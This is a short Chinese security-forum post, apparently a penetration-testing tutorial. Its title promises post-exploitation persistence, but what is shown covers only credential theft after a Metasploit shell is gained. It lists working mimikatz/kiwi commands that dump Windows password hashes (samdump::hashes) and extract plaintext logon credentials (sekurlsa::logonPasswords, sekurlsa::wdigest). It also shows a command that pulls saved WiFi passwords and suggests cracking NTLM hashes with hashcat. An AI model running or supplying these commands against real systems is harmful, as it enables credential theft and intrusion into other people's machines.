安全矩阵

 找回密码
 立即注册
搜索
查看: 4495|回复: 0

【渗透测试】基于后期的权限维持

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-5-6 20:56:14 | 显示全部楼层 |阅读模式
原文链接:【渗透测试】基于后期的权限维持

利用msf获得系统shell后,就完了?no~ 我们的渗透之路才刚刚开始。系统提权,权限维持,这些都是最基本的操作,除了这些还有那些好玩的呢?


获取明文密码如下,我们在msf中获得shell后,载入mimikatz模块load mimikatz




这里提示,需要载入kiwi我们再次载入


获取系统hash值
  1. mimikatz_command -f samdump::hashes
复制代码


参数说明:
user:用户名
NTLM:hash值(如果获取明文失败,我们可以直接利用hashcat暴力破解)
获取密码明文
  1. mimikatz_command -f sekurlsa::logonPasswords full
  2. mimikatz_command -f sekurlsa::wdigest
复制代码



获取目标WiFi密码
  1. wifi_list_shared
复制代码


获取扫雷的位置
  1. mimikatz_command -f winmine::infos
复制代码




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 01:38 , Processed in 0.013552 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表